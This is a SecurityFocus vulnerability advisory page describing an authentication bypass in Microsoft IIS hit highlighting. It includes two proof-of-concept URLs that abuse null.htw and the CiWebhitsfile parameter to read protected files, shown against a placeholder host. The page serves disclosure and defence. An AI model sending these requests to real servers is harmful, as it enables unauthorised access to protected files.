Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Microsoft Internet Information Server Hit Highlighting Authentication Bypass Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URIs are available:

https://www.example.com/authBypass/null.htw?CiWebhitsfile=/protectedfile.aspx&CiRestriction=b&CiHiliteType=full
https://www.example.com/authBypass/null.htw?CiWebhitsfile=/some/secretfile.txt&CiRestriction=b&CiHiliteType=full

The following exploit is available:







 

Privacy Statement
Copyright 2009, SecurityFocus